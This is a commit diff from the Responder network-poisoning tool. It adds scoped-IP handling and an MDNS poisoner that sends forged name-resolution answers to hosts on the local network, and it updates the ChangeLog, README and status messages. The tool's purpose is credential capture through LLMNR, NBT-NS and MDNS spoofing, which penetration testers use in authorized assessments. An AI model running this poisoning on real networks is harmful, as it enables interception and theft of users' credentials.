Added: In-scope IP handling for MDNS

Reflected recent changes
2025-12-07 21:21:34 +00:00 · 2014-03-22 13:33:03 -04:00 · 2014-03-22 13:19:56 -04:00
3 changed files with 21 additions and 7 deletions
--- a/1
+++ b/1
@@ -1,4 +1,5 @@
 ChangeLog Responder 2.0:
+- Added: MDNS Poisoner.
 - Added: -F command line switch to force NTLM authentication on PAC file retrieval.
 - Added: Ability to inject custom HTML in HTTP responses.
 - Added: New WPAD proxy server. Enabled by default.
--- a/README.md
+++ b/README.md
@@ -5,7 +5,7 @@ http://www.spiderlabs.com
 INTRODUCTION
 ============

-This tool is first an LLMNR and NBT-NS responder, it will answer to 
+This tool is first an LLMNR, NBT-NS and MDNS responder, it will answer to 
 *specific* NBT-NS (NetBIOS Name Service) queries based on their name 
 suffix (see: http://support.microsoft.com/kb/163409). By default, the
 tool will only answers to File Server Service request, which is for SMB.
--- a/Responder.py
+++ b/Responder.py
@@ -197,10 +197,10 @@ Challenge = ""
 for i in range(0,len(NumChal),2):
    Challenge += NumChal[i:i+2].decode("hex")

-Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
+Show_Help("[+]NBT-NS, LLMNR & MDNS responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))

 if AnalyzeMode:
-   print '[+]Responder is in analyze mode. No NBT-NS/LLMNR requests will be poisoned.\n'
+   print '[+]Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.\n'

 #Packet class handling all packet generation (see odict.py).
 class Packet():
@@ -1108,9 +1108,9 @@ class LLMNR(BaseRequestHandler):
                              except Exception:
                                 logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
                                 pass
-            else:
+
+            if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
               if data[2:4] == "\x00\x00":
-                  if Analyze(AnalyzeMode) == False:
                     if Parse_IPV6_Addr(data):
                        Name = Parse_LLMNR_Name(data)
                        buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
@@ -1131,8 +1131,10 @@ class LLMNR(BaseRequestHandler):
                           except Exception:
                              logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
                              pass
+            else:
+               pass
        except:
-           raise
+           pass

 ##################################################################################
 #DNS Stuff
@@ -1254,7 +1256,18 @@ class MDNS(BaseRequestHandler):
               print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))
               logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)))

-         if Analyze(AnalyzeMode) == False:
+         if RespondToSpecificHost(RespondTo):
+            if Analyze(AnalyzeMode) == False:
+               if RespondToIPScope(RespondTo, self.client_address[0]):
+                  if Parse_IPV6_Addr(data):
+                     print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
+                     logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
+                     Name = Poisoned_MDNS_Name(data)
+                     MDns = MDNSAns(AnswerName = Name)
+                     MDns.calculate()
+                     soc.sendto(str(MDns),(MADDR,MPORT))
+
+         if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
            if Parse_IPV6_Addr(data):
               print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
               logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
Author	SHA1	Message	Date
lgandx	b14ff0b36a	Added: In-scope IP handling for MDNS	2014-03-22 13:33:03 -04:00
lgandx	05b78079a8	Reflected recent changes	2014-03-22 13:19:56 -04:00